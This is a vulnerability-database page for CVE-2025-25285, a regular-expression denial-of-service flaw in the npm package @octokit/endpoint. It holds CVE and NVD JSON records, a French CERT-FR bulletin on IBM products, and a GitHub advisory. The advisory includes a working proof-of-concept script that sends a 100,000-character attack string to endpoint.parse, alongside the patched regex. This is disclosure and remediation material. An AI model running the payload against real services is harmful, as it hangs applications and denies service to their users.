CVE-2025-25285 (GCVE-0-2025-25285)
Vulnerability from cvelistv5
Published
2025-02-14 19:31
Modified
2025-02-14 19:44
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-1333 - Inefficient Regular Expression Complexity
Summary
@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| octokit | endpoint.js |
Version: >= 4.1.0, < 10.1.3 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-25285",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-14T19:42:58.912811Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-14T19:44:09.952Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "endpoint.js",
"vendor": "octokit",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.1.0, \u003c 10.1.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1333",
"description": "CWE-1333: Inefficient Regular Expression Complexity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-02-14T19:31:44.827Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv"
},
{
"name": "https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8"
},
{
"name": "https://github.com/octokit/endpoint.js/blob/main/src/parse.ts",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/octokit/endpoint.js/blob/main/src/parse.ts"
}
],
"source": {
"advisory": "GHSA-x4c5-c7rf-jjgv",
"discovery": "UNKNOWN"
},
"title": "@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-25285",
"datePublished": "2025-02-14T19:31:44.827Z",
"dateReserved": "2025-02-06T17:13:33.121Z",
"dateUpdated": "2025-02-14T19:44:09.952Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-25285\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-02-14T20:15:34.487\",\"lastModified\":\"2025-02-14T20:15:34.487\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1333\"}]}],\"references\":[{\"url\":\"https://github.com/octokit/endpoint.js/blob/main/src/parse.ts\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-25285\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-14T19:42:58.912811Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-14T19:44:05.551Z\"}}], \"cna\": {\"title\": \"@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking\", \"source\": {\"advisory\": \"GHSA-x4c5-c7rf-jjgv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"LOW\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"octokit\", \"product\": \"endpoint.js\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.1.0, \u003c 10.1.3\"}]}], \"references\": [{\"url\": \"https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv\", \"name\": \"https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8\", \"name\": \"https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/octokit/endpoint.js/blob/main/src/parse.ts\", \"name\": \"https://github.com/octokit/endpoint.js/blob/main/src/parse.ts\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1333\", \"description\": \"CWE-1333: Inefficient Regular Expression Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-02-14T19:31:44.827Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-25285\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-14T19:44:09.952Z\", \"dateReserved\": \"2025-02-06T17:13:33.121Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-02-14T19:31:44.827Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
fkie_cve-2025-25285
Vulnerability from fkie_nvd
Published
2025-02-14 20:15
Modified
2025-02-14 20:15
Severity ?
Summary
@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/octokit/endpoint.js/blob/main/src/parse.ts | ||
| security-advisories@github.com | https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8 | ||
| security-advisories@github.com | https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "@octokit/endpoint turns REST API endpoints into generic request options. Starting in version 4.1.0 and prior to version 10.1.3, by crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. The issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. Version 10.1.3 contains a patch for the issue."
},
{
"lang": "es",
"value": "@octokit/endpoint convierte los endpoints de la API REST en opciones de solicitud gen\u00e9ricas. A partir de la versi\u00f3n 4.1.0 y antes de la versi\u00f3n 10.1.3, al crear par\u00e1metros `options` espec\u00edficos, se puede activar la llamada `endpoint.parse(options)`, lo que lleva a un ataque de denegaci\u00f3n de servicio de expresi\u00f3n regular (ReDoS). Esto hace que el programa se cuelgue y da como resultado un alto uso de la CPU. El problema ocurre en la funci\u00f3n `parse` dentro del archivo `parse.ts` del paquete npm `@octokit/endpoint`. La versi\u00f3n 10.1.3 contiene un parche para el problema."
}
],
"id": "CVE-2025-25285",
"lastModified": "2025-02-14T20:15:34.487",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-02-14T20:15:34.487",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/octokit/endpoint.js/blob/main/src/parse.ts"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/octokit/endpoint.js/commit/6c9c5be033c450d436efb37de41b6470c22f7db8"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/octokit/endpoint.js/security/advisories/GHSA-x4c5-c7rf-jjgv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1333"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
CERTFR-2025-AVI-0279
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | Db2 versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH65394 | ||
| IBM | Db2 Warehouse | Db2 Warehouse versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le dernier correctif de sécurité | ||
| IBM | QRadar Analyst Workflow | QRadar Analyst Workflow versions antérieures à 3.0.0 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH65394",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Analyst Workflow versions ant\u00e9rieures \u00e0 3.0.0",
"product": {
"name": "QRadar Analyst Workflow",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-44906",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44906"
},
{
"name": "CVE-2023-45857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45857"
},
{
"name": "CVE-2023-45142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45142"
},
{
"name": "CVE-2022-48890",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48890"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-37071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37071"
},
{
"name": "CVE-2025-25285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25285"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-34997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34997"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2024-35946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35946"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-41761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41761"
},
{
"name": "CVE-2022-29153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29153"
},
{
"name": "CVE-2023-52605",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52605"
},
{
"name": "CVE-2021-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23337"
},
{
"name": "CVE-2018-6341",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-6341"
},
{
"name": "CVE-2023-52455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52455"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-26740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26740"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2025-25288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25288"
},
{
"name": "CVE-2024-35790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35790"
},
{
"name": "CVE-2022-48921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48921"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-25290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25290"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2021-47495",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47495"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2023-52832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52832"
},
{
"name": "CVE-2024-41110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41110"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2020-13844",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13844"
},
{
"name": "CVE-2024-26776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26776"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2024-41762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41762"
},
{
"name": "CVE-2024-39494",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39494"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2021-4204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4204"
},
{
"name": "CVE-2024-26843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26843"
},
{
"name": "CVE-2024-40679",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40679"
},
{
"name": "CVE-2023-52885",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52885"
},
{
"name": "CVE-2018-20225",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
},
{
"name": "CVE-2019-11253",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11253"
},
{
"name": "CVE-2023-52898",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52898"
},
{
"name": "CVE-2025-25289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25289"
},
{
"name": "CVE-2024-45663",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45663"
},
{
"name": "CVE-2023-52467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52467"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2024-36620",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36620"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
}
],
"initial_release_date": "2025-04-04T00:00:00",
"last_revision_date": "2025-04-04T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0279",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230024",
"url": "https://www.ibm.com/support/pages/node/7230024"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229770",
"url": "https://www.ibm.com/support/pages/node/7229770"
},
{
"published_at": "2025-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229443",
"url": "https://www.ibm.com/support/pages/node/7229443"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229768",
"url": "https://www.ibm.com/support/pages/node/7229768"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229772",
"url": "https://www.ibm.com/support/pages/node/7229772"
}
]
}
ghsa-x4c5-c7rf-jjgv
Vulnerability from github
Published
2025-02-14 17:56
Modified
2025-02-14 22:19
Severity ?
VLAI Severity ?
Summary
@octokit/endpoint has a Regular Expression in parse that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
Details
Summary
By crafting specific options parameters, the endpoint.parse(options) call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.
Details
The issue occurs in the parse function within the parse.ts file of the npm package @octokit/endpoint. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:
ts
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
The regular expression /[\w-]+(?=-preview)/g encounters a backtracking issue when it processes a large number of characters followed by the - symbol.
e.g., the attack string:
js
"" + "A".repeat(100000) + "-"
PoC
The gist
Here is the reproduction process for the vulnerability:
1. run 'npm i @octokit/endpoint'
2. Move poc.js to the root directory of the same level as README.md
3. run 'node poc.js'
result:
4. then the program will stuck forever with high CPU usage
```js
import { endpoint } from "@octokit/endpoint";
// import { parse } from "./node_modules/@octokit/endpoint/dist-src/parse.js";
const options = {
method: "POST",
url: "/graphql", // Ensure that the URL ends with "/graphql"
headers: {
accept: "" + "A".repeat(100000) + "-", // Pass in the attack string
"content-type": "text/plain",
},
mediaType: {
previews: ["test-preview"], // Ensure that mediaType.previews exists and has values
format: "raw", // Optional media format
},
baseUrl: "https://api.github.com",
};
const startTime = performance.now();
endpoint.parse(options);
const endTime = performance.now();
const duration = endTime - startTime;
console.log(Endpoint execution time: ${duration} ms);
``
1. **Import theendpointmodule**: First, import theendpointmodule from the npm package@octokit/endpoint`, which is used for handling GitHub API requests.
- Construct the
optionsobject that triggers a ReDoS attack: The following member variables are critical in constructing theoptionsobject: url: Set to"/graphql", ensuring the URL ends with/graphqlto match the format for GitHub's GraphQL API.headers:accept: A long attack string is crafted with"A".repeat(100000) + "-", which will be passed to the regular expression and cause a backtracking attack (ReDoS).-
mediaType:previews: Set to["test-preview"], ensuringmediaType.previewsexists and has values.format: Set to"raw", indicating raw data format. -
Call the
endpoint.parse(options)function and record the time: Call theendpoint.parse(options)function and useperformance.now()to record the start and end times, measuring the execution duration. -
Calculate the time difference and output it: Compute the difference between the start and end times and output it using
console.log. When the attack string length reaches 100000, the response time typically exceeds 10000 milliseconds, satisfying the characteristic condition for a ReDoS attack, where response times dramatically increase.
Impact
What kind of vulnerability is it?
This is a Regular Expression Denial of Service (ReDoS) vulnerability. It arises from inefficient regular expressions that can cause excessive backtracking when processing certain inputs. Specifically, the regular expression /[\w-]+(?=-preview)/g is vulnerable because it attempts to match long strings of characters followed by a hyphen (-), which leads to inefficient backtracking when provided with specially crafted attack strings. This backtracking results in high CPU utilization, causing the application to become unresponsive and denying service to legitimate users.
Who is impacted?
This vulnerability impacts any application that uses the affected regular expression in conjunction with user-controlled inputs, particularly where large or maliciously crafted strings can trigger excessive backtracking.
In addition to directly affecting applications using the @octokit/endpoint package, the impact is more widespread because @octokit/endpoint is a library used to wrap REST APIs, including GitHub's API. This means that any system or service built on top of this library that interacts with GitHub or other REST APIs could be vulnerable. Given the extensive use of this package in API communication, the potential for exploitation is broad and serious. The vulnerability could affect a wide range of applications, from small integrations to large enterprise-level systems, especially those relying on the package to handle API requests.
Attackers can exploit this vulnerability to cause performance degradation, downtime, and service disruption, making it a critical issue for anyone using the affected version of @octokit/endpoint.
Solution
To resolve the ReDoS vulnerability, the regular expression should be updated to avoid excessive backtracking. By modifying the regular expression to (?<![\w-])[\w-]+(?=-preview), we prevent the issue.
Here is how this change solves the problem:
Here is how this change solves the problem:
- Old Regular Expression:
/[\w-]+(?=-preview)/g - This regular expression matches any sequence of word characters (
\w) and hyphens (-) followed by-preview. - The issue arises when the regex engine encounters a long string of characters followed by a
-, causing excessive backtracking and high CPU usage. - New Regular Expression:
(?<![\w-])[\w-]+(?=-preview) - This updated regular expression uses a negative lookbehind
(?<![\w-]), ensuring that the matched string is not preceded by any word characters or hyphens (\wor-). - The new expression still matches sequences of word characters and hyphens, but the negative lookbehind ensures it doesn't cause backtracking issues when processing long attack strings.
- By adding this lookbehind, we effectively prevent the vulnerability, ensuring the regex operates efficiently without excessive backtracking.
Full Solution Example:
The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:
1. Update the Regular Expression: In the parse.ts file (or wherever the original regex is defined), replace the existing regular expression:
ts
const previewsFromAcceptHeader =
headers.accept.match(/[\w-]+(?=-preview)/g) || ([] as string[]);
With the updated one:
ts
const previewsFromAcceptHeader =
headers.accept.match(/(?<![\w-])[\w-]+(?=-preview)/g) || ([] as string[]);
- Test the Change: After updating the regular expression, thoroughly test the application with both regular and malicious inputs to ensure that:
- The functionality remains correct and the expected matches still occur.
- The performance improves and the ReDoS vulnerability no longer occurs when handling large attack strings.
- Deploy the Fix: Once the solution is verified, deploy the fix to your production environment to protect against potential attacks.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@octokit/endpoint"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.5"
},
{
"fixed": "9.0.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@octokit/endpoint"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-25285"
],
"database_specific": {
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2025-02-14T17:56:18Z",
"nvd_published_at": "2025-02-14T20:15:34Z",
"severity": "MODERATE"
},
"details": "### Summary\nBy crafting specific `options` parameters, the `endpoint.parse(options)` call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization.\n\n### Details\nThe issue occurs in the `parse` function within the `parse.ts` file of the npm package `@octokit/endpoint`. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62:\n```ts\nheaders.accept.match(/[\\w-]+(?=-preview)/g) || ([] as string[]);\n```\nThe regular expression `/[\\w-]+(?=-preview)/g` encounters a backtracking issue when it processes `a large number of characters` followed by the `-` symbol.\ne.g., the attack string: \n```js\n\"\" + \"A\".repeat(100000) + \"-\"\n```\n\n### PoC\n[The gist](https://gist.github.com/ShiyuBanzhou/a17202ac1ad403a80ca302466d5e56c4)\nHere is the reproduction process for the vulnerability:\n1. run \u0027npm i @octokit/endpoint\u0027\n2. Move `poc.js` to the root directory of the same level as `README.md`\n3. run \u0027node poc.js\u0027\nresult:\n4. then the program will stuck forever with high CPU usage\n```js\nimport { endpoint } from \"@octokit/endpoint\";\n// import { parse } from 